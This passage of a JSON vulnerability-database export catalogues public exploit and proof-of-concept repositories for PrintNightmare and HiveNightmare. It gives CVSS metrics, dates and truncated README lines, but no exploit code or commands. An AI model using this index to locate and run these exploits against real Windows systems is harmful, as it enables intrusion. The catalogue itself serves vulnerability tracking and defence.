CVE-2021-36934](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36934>)\n * [CERT/CC vulnerability notes](<https://www.kb.cert.org/vuls/id/506989>)\n * [Public PoC for CVE-2021-36934](<https://github.com/GossiTheDog/HiveNightmare>)\n * [Additional demo and analysis of CVE-2021-36934](<https://doublepulsar.com/hivenightmare-aka-serioussam-anybody-can-read-the-registry-in-windows-10-7a871c465fa5>)", "cvss3": {}, "published": "2021-07-21T16:01:19", "type": "rapid7blog", "title": "Microsoft SAM File Readability CVE-2021-36934: What You Need to Know", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-36934"], "modified": "2021-07-21T16:01:19", "id": "RAPID7BLOG:21FF66FD08C23AC39BCCB8CFE2238507", "href": "https://blog.rapid7.com/2021/07/21/microsoft-sam-file-readability-cve-2021-36934-what-you-need-to-know/", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "githubexploit": [{"lastseen": "2022-03-18T14:37:24", "description": "# PrintNightmare - Windows Print Spooler RCE/LPE Vulnerability (...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-03T15:15:12", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2022-03-18T12:17:12", "id": "CD2BFDFF-9EBC-5C8F-83EC-62381CD9BCD5", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-27T21:17:11", "description": "# PrintNightmare (CVE-2021-1675)\n\nThis Zeek script detects succe...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-07-02T16:44:24", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2022-03-27T16:56:12", "id": "3399B834-8492-5C0C-AA14-7F120BA37AF6", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-02-22T08:28:18", "description": "# CVE-2021-1675 / CVE-2021-34527\n\nImpacket implementation of the...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2022-02-22T03:32:14", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2022-02-22T03:32:28", "id": "21F83D93-118D-50C7-A5C0-B2069237666E", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-24T00:25:23", "description": "# It Was All A Dream\n\nA [CVE-2021-34527](https://msrc.microsoft....", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-07-05T20:13:49", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2022-03-23T19:20:20", "id": "0BB19334-D311-5464-B40B-7B27A0AD8825", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:22:37", "description": "# CVE-2021-1675 / CVE-2021-34527\n\nTwo mini Script to check if th...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-01T12:12:16", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2021-07-02T07:49:06", "id": "F92F972D-7309-5D0B-BCC2-054883AE83E9", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:28:22", "description": "# CVE-2021-1675 / CVE-2021-34527\n\nImpacket implementation of the...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-12T08:18:40", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2021-10-24T06:07:00", "id": "F1347375-6380-5145-9881-486B76875649", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:22:32", "description": "# Windows Print Spooler Service RCE CVE-2021-1675 (PrintNightmar...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-03T12:25:21", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2021-10-24T06:03:49", "id": "B8D9E2C0-202B-5806-88D2-B0E797582618", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-15T19:32:13", "description": "# Local Privilege Escalation Edition of CVE-2021-1675/CVE-2021-3...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-01T09:47:13", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527", "CVE-2021-1675"], "modified": "2022-03-15T16:19:02", "id": "AAD37CB5-B2C3-5908-B0D3-052CF47F6D25", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-30T03:44:07", "description": "# CVE-2021-1675 / CVE-2021-34527\n\nImpacket implementation of the...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-06-29T17:24:14", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2022-03-30T03:06:53", "id": "E82ECEEF-07B8-5340-BAC6-FA5B0E964772", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-02-19T23:46:37", "description": "# CVE-2021-34527-CVE-2021-1675\nPrintNightmare+Manual\nhttps://sat...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2022-02-19T23:20:58", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527", "CVE-2021-1675"], "modified": "2022-02-19T23:20:58", "id": "86F04665-0984-596F-945A-3CA176A53057", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-30T19:52:51", "description": "# CVE-2021-34527 - PrintNightmare LPE (PowerShell)\n\n> Caleb Stew...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-07-02T12:10:49", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2022-03-30T10:57:52", "id": "B03B4134-B4C9-5B2D-BA55-EEEA540389F4", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-16T17:02:43", "description": "= Print Nightmare \u5206\u6790\u62a5\u544a\n:imagesdir: Figures\n:toc:\n:icons: font\n:f...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-22T10:49:30", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527", "CVE-2021-1675"], "modified": "2022-03-16T09:18:03", "id": "F1B229EB-2178-53B9-839E-BA0B916376A2", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-27T17:02:41", "description": "# PrintNightmare\n\nPython implementation for PrintNightmare (CVE-...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-26T13:53:10", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2022-03-27T13:10:07", "id": "8EDE916A-F04B-59F0-A88D-13DEF969DC00", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:28:13", "description": "## Kritische Sicherheitsl\u00fccke\n### PrintNightmare CVE-2021-1675, ...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-02T07:30:52", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2021-08-05T03:00:36", "id": "0263BC36-BEB1-519B-965B-52D9E6AB116F", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:28:59", "description": "# CVE-2021-1675 / CVE-2021-34527\n\nImpacket implementation of the...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-05T12:10:43", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2021-10-24T06:06:09", "id": "E7D3FB75-54DE-5CD8-83D6-438BFC7CFA74", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-07T23:15:44", "description": "# CVE-2021-1675-LPE-EXP\n**Simple LPE Exploit of CVE-2021-1675** ...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-01T09:00:31", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2022-03-07T15:32:16", "id": "64AAF745-D50D-575C-B3FF-A09072475502", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:32:50", "description": "# PrintNightmare\n\nHere is a project that will help to fight agai...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-28T07:55:42", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2021-09-15T06:40:48", "id": "DF28DCE7-CCFF-5653-81BA-719525BE09AD", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-13T18:54:50", "description": "# PyNightmare\nPoC for CVE-2021-36934 Aka HiveNightmare/SeriousSA...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-25T00:31:11", "type": "githubexploit", "title": "Exploit for Incorrect Permission Assignment for Critical Resource in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36934"], "modified": "2021-12-31T15:22:31", "id": "5D86E24D-31EE-5EFA-9D3D-FDD9090FFDEE", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T18:55:51", "description": "# VSSCopy\nSmall and dirty PoC f...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-22T00:55:23", "type": "githubexploit", "title": "Exploit for Incorrect Permission Assignment for Critical Resource in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": 